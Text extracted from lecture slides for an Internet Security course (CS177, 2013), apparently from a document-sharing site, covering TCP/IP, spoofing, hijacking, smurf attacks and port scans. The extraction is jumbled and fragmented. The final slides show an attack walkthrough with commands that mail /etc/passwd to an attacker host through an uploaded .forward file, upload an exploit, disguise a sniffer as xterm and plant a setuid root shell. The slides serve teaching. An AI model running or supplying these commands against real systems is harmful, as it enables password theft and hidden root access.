Académique Documents
Professionnel Documents
Culture Documents
A network of networks
A logic network composed of a set of autonomous
subnetworks connected by gateways
Open architecture
Different protocols for physical transmission
A single protocol suite for the network and transport
layers
Internet Security:
An Introduction
Internet Security
CS177 2013
Internet Security
CS177 2013
CS177 2013
Internet Security
CS177 2013
Internet Security
CS177 2013
History (70-80)
The Defense Advanced
Research Project Agency
(DARPA) develops
ARPANET
First four nodes (1969):
UC Los Angeles
UC Santa Barbara
Stanford Research Institute
University of Utah
History (90)
Fast growth (size and traffic volume)
1991: Tim Berners-Lee (CERN) creates the WorldWide Web
Internet Security
CS177 2013
IP (Internet Protocol)
ICMP (Internet Control Message Protocol)
IGMP (Internet Group Management Protocol)
DNS
HTTP
TCP
RPC
TCP/IP Layering
SMTP
UDP
IGMP
IP
ICMP
ARP
Hardware Interface
RARP
Physical Layer
Internet Security
CS177 2013
Internet Security
Internet Addressing
CS177 2013
Subnetwork 192.168.1
192.168.14.173
192.168.1.29
192.168.1.15
192.168.1.23
192.168.1.45
Subnetwork 192.168.14
192.168.1.99
192.168.1.1
192.168.14.1
Subnetwork 192.168.2
192.168.2.1
192.168.2.170
192.168.2.11
192.168.2.23
192.168.2.78 192.168.2.67
192.176.15.56
Internet
Subnetwork 111.10.20
111.10.20.14
111.10.20.76
111.10.20.123
111.10.20.121 111.10.20.135
111.12.23.145
111.10.20.1
Internet Security
CS177 2013
Internet Security
IP Datagram
0
4
Version
8
HL
12
16
Identifier
Time To Live
20
CS177 2013
10
CS177 2013
12
IP Encapsulation
24
28
31
Total length
Flags
Protocol
Fragment offset
IP header
IP data
Header checksum
Source IP address
Destination IP address
Options
Frame header
Frame data
Padding
Data
Internet Security
CS177 2013
11
Internet Security
Ethernet
From 111.10.20.121
To
111.10.20.14
From 09:45:FA:07:22:23
To
0A:12:33:B2:C4:11
111.10.20.14
(0A:12:33:B2:C4:11)
111.10.20.76
111.10.20.123
111.10.20.135
111.10.20.121
(09:45:FA:07:22:23)
CS177 2013
13
Internet Security
Ethernet Frame
dest (6)
data (46-1500)
ARP (28)
PAD (18)
0808
RARP (28)
PAD (18)
Internet Security
14
CRC (4)
IP datagram
0806
CS177 2013
Sniffing
Spoofing
Hijacking
ARP attacks
Goals
CS177 2013
15
Impersonation of a host
Denial of service
Access to information
Tampering with delivery mechanisms
Internet Security
Network Sniffing
CS177 2013
16
IP Spoofing
A host impersonates another host by sending a
datagram with the address of some other host as the
source address
The attacker sniffs the network looking for replies
from the attacked host
From 111.10.20.123
Subnetwork 111.10.20
To
111.10.20.14
From 09:45:FA:07:44:16
To
0A:12:33:B2:C4:11
111.10.20.14
111.10.20.123
111.10.20.76
111.10.20.135
111.10.20.121
Sniffer
Ethernet
Internet Security
CS177 2013
17
Internet Security
CS177 2013
18
Why IP Spoofing?
Hijacking
IP spoofing is used to impersonate sources of securitycritical information (e.g., a DNS server or a NIS server)
IP spoofing is used to exploit address-based
authentication
RPC/NFS/NIS
r-commands (rsh, rcp, etc.)
Internet Security
CS177 2013
19
Internet Security
Hijacking
20
Request
Spoofed reply
CS177 2013
Reply
Request
Client
Server
Attacker
Internet Security
CS177 2013
21
Internet Security
Routing
22
Blind IP Spoofing
Subnetwork
Subnetwork
CS177 2013
Subnetwork
Subnetwork
Subnetwork
From 111.10.20.121
To
128.111.41.10
A0:B0:C0:D0:E0:F0
111.10.20.121
AA:BB:CC:DD:EE:FF
Internet Security
From 128.111.41.135
To
128.111.41.10
A1:B1:C1:D1:E1:F1
128.111.41.135
Trust
128.111.41.10
11:21:31:41:51:61
111.10.20.121
From A1:B1:C1:D1:E1:F1
To
11:21:31:41:51:61
CS177 2013
23
Internet Security
128.111.41.10
CS177 2013
24
Man-in-the-middle Attacks
Requests
Responses
Error messages
Network
Network
Gateway
Internet Security
CS177 2013
25
Internet Security
26
RPC
DNS
SMTP
HTTP
CS177 2013
4
Type
12
16
Code
20
24
28
31
Checksum
Data
TCP
UDP
IGMP
IP
ICMP
ARP
Hardware Interface
RARP
Physical Layer
Internet Security
CS177 2013
27
Internet Security
CS177 2013
ICMP Message
ICMP Messages
Internet Security
CS177 2013
29
Internet Security
CS177 2013
28
30
Ping
# ping 192.168.1.1
PING 192.168.1.1 (192.168.1.1) from 192.168.1.100 : 56(84)
bytes of data.
64 bytes from 192.168.1.1: icmp_seq=0 ttl=64 time=1.049
msec
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=660 usec
64 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=597 usec
64 bytes from 192.168.1.1: icmp_seq=3 ttl=64 time=548 usec
64 bytes from 192.168.1.1: icmp_seq=4 ttl=64 time=601 usec
64 bytes from 192.168.1.1: icmp_seq=5 ttl=64 time=592 usec
64 bytes from 192.168.1.1: icmp_seq=6 ttl=64 time=547 usec
Type = 0 or 8
12
16
20
Code = 0
24
28
31
Checksum
identifier = Process ID
Sequence number
Optional data
--- 192.168.1.1 ping statistics --7 packets transmitted, 7 packets received, 0% packet loss
round-trip min/avg/max/mdev = 0.547/0.656/1.049/0.165 ms
Internet Security
CS177 2013
31
Internet Security
CS177 2013
Smurf
Subnetwork 192.168.1
192.168.1.29
192.168.1.15
192.168.1.23
192.168.1.45
Echo request
from 128.111.41.10
to 192.168.1.255
192.168.1.99
Echo request
from 128.111.41.10
to 192.168.2.255
Subnetwork 192.168.2
32
Internet
192.168.2.170
192.168.2.11
192.168.2.23
192.168.2.78 192.168.2.67
Echo request
from 128.111.41.10
to 111.10.20.255
128.111.41.10
Subnetwork 111.10.20
Internet Security
CS177 2013
33
111.10.20.14
111.10.20.76
111.10.20.123
111.10.20.121 111.10.20.135
Internet Security
12
16
code (0 or 1)
20
24
28
31
checksum
Unused (0)
IP header + first 8 bytes of the original datagram
Internet Security
34
Traceroute
Used when
CS177 2013
CS177 2013
35
Internet Security
CS177 2013
36
Traceroute
Internet Security
CS177 2013
37
CS177 2013
UDP Message
RPC
DNS
SMTP
HTTP
12
16
20
24
28
31
TCP
38
Checksum
Data
UDP
IGMP
IP
ICMP
ARP
Hardware Interface
RARP
Physical Layer
Internet Security
CS177 2013
39
Internet Security
UDP Encapsulation
CS177 2013
UDP Spoofing
Basically IP spoofing
Very easy to perform
UDP header
40
UDP data
UDP reply
IP header
Frame header
IP data
Trusted
client
Frame data
Server
Attacker
Internet Security
CS177 2013
41
Internet Security
CS177 2013
42
UDP Hijacking
UDP Portscan
UDP request
UDP reply
UDP request
Client
Server
Attacker
Internet Security
CS177 2013
43
Internet Security
CS177 2013
UDP Portscan
UDP Portscan
19:37:31.305674
19:37:31.305706
19:37:31.305730
19:37:31.305734
19:37:31.305770
19:37:31.305775
19:37:31.305804
19:37:31.305809
19:37:31.305815
19:37:31.305871
19:37:31.305875
19:37:31.305881
19:37:31.305887
19:37:31.305892
19:37:31.305927
19:37:31.305932
19:37:31.305974
19:37:31.305979
19:37:31.617611
19:37:31.617641
19:37:31.617663
19:37:31.617737
Internet Security
CS177 2013
45
CS177 2013
46
TCP Segment
The TCP protocol relies on IP to provide a connectionoriented, reliable stream delivery service (no loss, no
duplication, no transmission errors, correct ordering)
TCP, like UDP, provides the port abstraction
TCP allows two nodes to establish a virtual circuit,
identified by source IP address, destination IP address,
source TCP port, destination TCP port
The virtual circuit is composed of two streams (full-duplex
connection)
The pair IP address/port number is sometimes called a
socket (and the two streams are called a socket pair)
CS177 2013
61284)
31166)
31406)
50734)
33361)
14242)
134 unreachable
17622)
52452)
140 unreachable
131 unreachable
132 unreachable
135 unreachable
139 unreachable
38693)
60943)
133 unreachable
130 unreachable
21936)
17647)
55)
136 unreachable
Internet Security
Internet Security
44
12
16
20
Source port
24
28
31
Destination port
Sequence number
Acknowledgment number
HLEN
Reserved
Flags
Window
Checksum
Urgent pointer
Options
Padding
Data
47
Internet Security
CS177 2013
48
TCP Encapsulation
TCP header
IP header
Frame header
TCP data
IP data
Frame data
Internet Security
CS177 2013
49
Internet Security
TCP Window
50
TCP Flags
Flags are used to manage the establishment and
shutdown of a virtual circuit
Internet Security
CS177 2013
CS177 2013
Internet Security
CS177 2013
52
The client sends a segment with the ACK flag set and
with sequence number sc + 1 and acknowledgment
number ss + 1
Internet Security
CS177 2013
53
Internet Security
CS177 2013
54
13987
23
seq: 6574
ack: 0
SYN:1 ACK:0 FIN:0
23
13987
seq: 7611 ack: 6575
SYN:1 ACK:1 FIN:0
Client
13987
23
seq: 6575 ack: 7612
SYN:0 ACK:1 FIN:0
Server
Internet Security
CS177 2013
55
Internet Security
CS177 2013
56
CS177 2013
58
13987
23
seq: 6575
ack:7612
SYN:0 ACK:1 FIN:0
25 bytes
Client
23
13987
seq: 7612 ack: 6600
SYN:0 ACK:1 FIN:0
30 bytes
Server
13987
23
seq: 6600 ack: 7642
SYN:0 ACK:1 FIN:0
Internet Security
CS177 2013
57
Internet Security
CS177 2013
Internet Security
13987
23
seq: 6983
ack:8777
SYN:0 ACK:1 FIN:1
23
13987
seq: 8777 ack: 6984
SYN:0 ACK:1 FIN:0
30 bytes
Client
23
13987
seq: 8807 ack: 6984
SYN:0 ACK:1 FIN:1
Server
13987
23
seq: 6984 ack: 8808
SYN:0 ACK:1 FIN:0
59
Internet Security
CS177 2013
60
10
TCP Portscan
connect() Scan
CS177 2013
61
Internet Security
CS177 2013
63
S
S
S
S
S
S
R
R
R
S
Internet Security
CS177 2013
64
11:39:07.356917
11:39:07.356921
11:39:07.356925
11:39:07.356927
11:39:07.356931
11:39:07.357918
11:39:07.357983
11:39:07.358051
11:39:07.358326
11:39:07.666939
11:39:07.976951
11:39:08.286929
Internet Security
62
Internet Security
CS177 2013
CS177 2013
65
Internet Security
F
F
F
F
F
R
R
R
R
F
F
F
0:0(0)
0:0(0)
0:0(0)
0:0(0)
0:0(0)
0:0(0)
0:0(0)
0:0(0)
0:0(0)
0:0(0)
0:0(0)
0:0(0)
win
win
win
win
win
ack
ack
ack
ack
win
win
win
1024
1024
1024
1024
1024
1 win
1 win
1 win
1 win
1024
1024
1024
0
0
0
0
(DF)
(DF)
(DF)
(DF)
CS177 2013
66
11
OS Fingerprinting
TCP Spoofing
TCP options
Internet Security
CS177 2013
67
Internet Security
CS177 2013
TCP Spoofing
TCP Spoofing
1 138.13.2.67 211.3.56.5
138.13.2.67 211.3.56.5 3
13987
23
seq: 11001 ack: 54003
SYN:0 ACK:1 FIN:0
2 211.3.56.5 138.13.2.67
A: 211.3.56.5
513
13987
seq: 54002 ack: 11001
SYN:1 ACK:1 FIN:0
69
B:138.13.2.67
Internet Security
TCP Hijacking
CS177 2013
70
TCP Hijacking
The attacker can eavesdrop the traffic between client and server
The attacker can guess the correct seq/ack numbers
13987
513
seq: 11000
ack: 0
SYN:1 ACK:0 FIN:0
C:117.76.3.3
Internet Security
68
CS177 2013
71
Internet Security
CS177 2013
72
12
TCP Hijacking
TCP Hijacking
CL_SEQ = SVR_ACK
SVR_SEQ = CL_ACK
Client
Server
Attacker
Internet Security
CS177 2013
73
Internet Security
CS177 2013
75
Internet Security
76
Traceroute
traceroute to res-server.ns.com
Traceroute
IP sweep
UDP portsweep
TCP portsweep
DNS zone transfer
rpcinfo
Service banners
Internet Security
CS177 2013
Choose a network
Gather information (topology, services)
Exploit vulnerabilities
Create backdoors
Cover tracks
Gather Information
74
TCP Hijacking
Internet Security
CS177 2013
CS177 2013
77
Internet Security
CS177 2013
78
13
IP Sweep
Network Topology
sales1.ns.com sales2.ns.com sales3.ns.com sales4.ns.com sales-server.ns.com
195.121.31.19 195.121.31.43 195.121.31.181 195.121.31.22
195.121.31.11
cisco-sales.ns.com
195.121.31.11 cisco-ns.ns.com
195.121.39.51
cisco-res.ns.com
195.121.32.37
res1.ns.comt
res2.ns.com
195.121.32.15 195.121.32.60
Internet Security
CS177 2013
79
res3.ns.com
195.121.32.75
res-server.ns.com
195.121.32.42
Internet Security
TCP Portsweep
attack.mynet.net
131.111.15.27
CS177 2013
80
CS177 2013
82
UDP Portsweep
Internet Security
CS177 2013
81
Internet Security
Check Services
FTP:220 sales4 FTP server (Version
1.7.193.3) ready
USER anonymous
331 Guest login ok, send ident as
password.
PASS nobody@there.com
230 Guest login ok, access restrictions
apply.
257 "/" is current directory.
MKDIR test
257 MKD command successful.
RMDIR test
250 RMD command successful.
BYE
221 Goodbye.
Internet Security
Attack
attack% echo |/bin/mail root@131.111.15.27 < /etc/passwd > my_forward
attack% ftp sales4.ns.com
Connected to sales4.ns.com
220 Hello unknown@131.111.15.27!
220 sales4 FTP server (SunOS 4.1)
Name: anonymous
331 Guest login ok, send your complete e-mail address as password.
Password: mickey@disney.com
230 Guest login ok, access restrictions apply.
ftp> put my_forward .forward
ftp> bye
Goodbye
attack% echo ciao | mail ftp@sales4.ns.com
CS177 2013
83
Internet Security
CS177 2013
84
14
Password File
More Privileges
attack% ftp sales4.ns.com
Connected to 195.121.31.22.
220-Hello unknown@ 131.111.15.27,
Name: mark
331 Password required for verdi
Password: saratoga
230 User mark logged in.
ftp> put loadmodule.xpl
250 CWD command successful.
...
ftp> bye
221 Goodbye.
attack%
Internet Security
CS177 2013
85
Internet Security
What Next?
CS177 2013
86
Conclusions
Install a sniffer
# mv sniffit xterm
# ./xterm
Create a supershell
# cp /bin/sh ~mark/.config
# chmod 4755 ~mark/.config
Internet Security
CS177 2013
87
Internet Security
CS177 2013
88
15